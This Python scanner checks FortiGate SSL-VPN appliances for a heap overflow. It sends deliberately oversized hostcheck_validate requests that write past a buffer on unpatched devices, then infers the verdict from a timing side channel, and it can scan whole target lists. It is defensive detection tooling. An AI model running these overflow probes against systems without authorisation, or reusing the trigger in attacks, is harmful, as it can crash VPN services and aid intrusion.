#!/usr/bin/env python3
import argparse
import requests
import struct
import hashlib
import sys
import os
import re
from urllib3.exceptions import InsecureRequestWarning
from scipy.stats import ttest_ind
import numpy as np
# Every request in this scanner is sent with verify=False (the appliance's
# TLS certificate is not what is under test), so drop the per-call
# InsecureRequestWarning noise up front.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Cap per target: at most 400 in-bounds ("regular") probes interleaved with
# 400 oversized ("overflow") probes.  check_target breaks out as soon as the
# t-test is already conclusive, so a real scan usually sends far fewer.
REQUESTS_PER_GROUP: int = 400
def gen_enc_hdr(salt: bytes, l: int) -> str:
    """Build the hex ``enc`` header that prefixes a hostcheck_validate body.

    The header is the fixed prefix ``00bfbfbf`` followed by the two-byte
    little-endian length ``l``, XORed with the first two bytes of an MD5
    keystream derived from the server-supplied ``salt``.  This length field is
    the value the probes in ``check_target`` vary (in-bounds vs. oversized), so
    this string is what turns a request into an overflow attempt.

    Args:
        salt: the 8 ASCII hex bytes scraped from ``/remote/info``.
        l: length to encode; must fit in 16 bits or ``struct.error`` is raised.

    Returns:
        A 12-character lowercase hex string.
    """
    keystream = hashlib.md5(
        salt + b"00bfbfbf" + b"GCC is the GNU Compiler Collection."
    ).digest()
    lo, hi = struct.pack("<H", l)
    masked = bytes((lo ^ keystream[0], hi ^ keystream[1]))
    return "00bfbfbf" + masked.hex()
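def make_req(session, baseurl, salt, allocsize, reqsize, timeout=None):
    """POST one ``hostcheck_validate`` probe and return the response.

    The body is ``ajax=1&username=test&realm=&enc=<hdr><payload>`` where
    ``hdr`` is ``gen_enc_hdr(salt, reqsize)`` and ``payload`` is ``allocsize``
    repetitions of the hex pair ``41``.  ``reqsize`` is therefore the length
    the server is told to expect while ``allocsize`` governs what is actually
    sent; ``check_target`` passes ``reqsize > allocsize`` for its overflow
    probes and ``reqsize < allocsize`` for the control group.

    Args:
        session: ``requests.Session`` so consecutive probes reuse a connection.
        baseurl: ``https://host:port`` with no trailing slash.
        salt: salt bytes scraped from ``/remote/info``.
        allocsize: number of ``41`` hex pairs appended after the header.
        reqsize: length encoded in the header (must fit in 16 bits).
        timeout: optional ``requests`` timeout in seconds.  ``None`` (the
            default) keeps the previous blocking behaviour; a scan over many
            hosts should set one so a single stalled target cannot hang it.

    Returns:
        The ``requests.Response``; callers read ``.elapsed`` for the timing
        side channel.
    """
    enc = gen_enc_hdr(salt, reqsize) + "41" * allocsize
    body = "ajax=1&username=test&realm=&enc=" + enc
    # verify=False is deliberate: the appliance certificate is not what is
    # being tested and is commonly self-signed.  Nothing in the response is
    # trusted beyond its arrival time.
    return session.post(
        baseurl + "/remote/hostcheck_validate",
        headers={"content-type": "application/x-www-form-urlencoded"},
        verify=False,
        data=body,
        timeout=timeout,
    )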
def reject_outliers(data):
    """Drop the slowest quarter of a latency sample.

    Keeps every value at or below the sample's 75th percentile (NumPy's
    default linear interpolation) and preserves input order.  Roughly 25% of
    the points are discarded, which costs sample size but removes the random
    latency spikes that would otherwise swamp the t-test.

    Args:
        data: non-empty sequence of timings.

    Returns:
        list of the retained values, in their original order.
    """
    cutoff = np.quantile(data, 0.75)
    return [value for value in data if value <= cutoff]
def check_stats(regular, overflow):
    """Welch t-test between the two latency groups after outlier rejection.

    Args:
        regular: timings of probes whose encoded length was in bounds.
        overflow: timings of probes whose encoded length exceeded the buffer.

    Returns:
        ``(n_overflow, n_regular, result)`` — the surviving sample sizes after
        ``reject_outliers`` and the ``scipy.stats.ttest_ind`` result for
        ``overflow`` versus ``regular`` with ``equal_var=False``.  Note the
        order: the overflow count comes first, and a positive statistic means
        the overflow group was slower.
    """
    trimmed_overflow, trimmed_regular = map(reject_outliers, (overflow, regular))
    welch = ttest_ind(trimmed_overflow, trimmed_regular, equal_var=False)
    return len(trimmed_overflow), len(trimmed_regular), welch
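def _elapsed_us(response) -> float:
    """Whole round-trip time of ``response`` in microseconds.

    ``timedelta.microseconds`` is only the sub-second component, so a reply
    that took 1.2 s would have been recorded as 200 000 µs; use the full
    duration instead so slow targets are not silently mis-measured.
    """
    return response.elapsed.total_seconds() * 1_000_000


def check_target(baseurl):
    """Classify one FortiGate SSL-VPN endpoint as Patched/Vulnerable/Unknown.

    Scrapes the ``salt`` from ``/remote/info``, then alternates oversized and
    in-bounds ``hostcheck_validate`` probes (see ``make_req``) and compares the
    two latency populations with a Welch t-test.  A significantly slower
    "overflow" group is reported as ``Vulnerable``, a faster one as
    ``Patched``; anything in between is ``Unknown``.

    WARNING: the oversized probes really do write past the allocation on an
    unpatched device.  ``alloc_size`` is chosen so the corrupted bytes land in
    an unused gap of the same size class, but this is still an active test
    with a non-zero risk of disturbing the SSL-VPN daemon — run it only
    against systems you are authorised to test.  Because the verdict is a
    timing side channel, a noisy path to the target degrades confidence
    (reported via the "Low confidence" warning).

    Args:
        baseurl: ``https://host:port`` with no trailing slash.

    Returns:
        ``"Patched"``, ``"Vulnerable"``, ``"Unknown"``, or a string starting
        with ``"ERROR: "`` when the target could not be probed (not a
        FortiGate SSL-VPN page, or a connection/timeout failure).
    """
    try:
        # Bounded so one unreachable host cannot stall a file-list scan.
        r = requests.get(baseurl + "/remote/info", verify=False, timeout=30)
    except requests.RequestException as exc:
        return f"ERROR: {type(exc).__name__} fetching /remote/info"
    matches = re.findall(r"salt='([0-9a-f]{8})'", r.text)
    if len(matches) != 1:
        return "ERROR: not FortiGate ssl vpn?"
    salt = matches[0].encode()

    # Allocations of size 0xe000+1-0x10000 share one size class; 0xF800 leaves
    # a 2 KiB gap between the end of our chunk and the next one, so on a
    # vulnerable device the overflow only corrupts unused memory.
    alloc_size = 0xF800
    overflow_us = []
    regular_us = []
    try:
        with requests.Session() as session:
            for i in range(REQUESTS_PER_GROUP):
                r1 = make_req(session, baseurl, salt, alloc_size, alloc_size + 0xF0)
                overflow_us.append(_elapsed_us(r1))
                r2 = make_req(session, baseurl, salt, alloc_size, alloc_size // 2)
                regular_us.append(_elapsed_us(r2))
                # Stop early once both trimmed groups are large enough and the
                # difference is already unambiguous.
                if i > 20 and i % 10 == 0:
                    n_overflow, n_regular, t = check_stats(regular_us, overflow_us)
                    if n_overflow > 20 and n_regular > 20 and t.pvalue < 0.001:
                        break
    except requests.RequestException as exc:
        return f"ERROR: {type(exc).__name__} during probing"

    _, _, t_stat = check_stats(regular_us, overflow_us)
    # A NaN statistic (e.g. zero variance) fails every comparison below and
    # falls through to "Unknown" without a warning.
    if t_stat.pvalue > 0.001 or (-2 < t_stat.statistic < 2):
        print("WARNING: Low confidence results.")
    if t_stat.statistic < -0.5:
        return "Patched"
    if t_stat.statistic > 0.5:
        return "Vulnerable"
    return "Unknown"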
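def _target_url(spec: str) -> str:
    """Turn an ``ip:port`` (or ``[v6addr]:port``) spec into an ``https`` base URL.

    The port is split off at the *last* colon so bracketed IPv6 literals work;
    a spec with a missing host or port raises ``ValueError`` with a readable
    message instead of the bare tuple-unpacking error.
    """
    host, sep, port = spec.rpartition(":")
    if not sep or not host or not port:
        raise ValueError(f"expected 'ip:port', got {spec!r}")
    return f"https://{host}:{port}"


def _scan(spec: str) -> None:
    """Check a single target spec and print its verdict."""
    baseurl = _target_url(spec)
    print("Checking " + baseurl)
    print(check_target(baseurl))


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument("-u", "--url", help="Single target IP and port (e.g., 192.168.0.1:443)")
    group.add_argument("-f", "--file-list", help="File containing IP and port pairs in 'ip:port' format")
    args = parser.parse_args()
    if args.url:
        _scan(args.url)
    elif args.file_list:
        # Blank lines are skipped; a malformed line is reported and the scan
        # continues with the next target rather than aborting the whole list.
        with open(args.file_list, "r") as file:
            for line in file:
                line = line.strip()
                if not line:
                    continue
                try:
                    _scan(line)
                except ValueError as exc:
                    print(f"ERROR: {exc}")
                print()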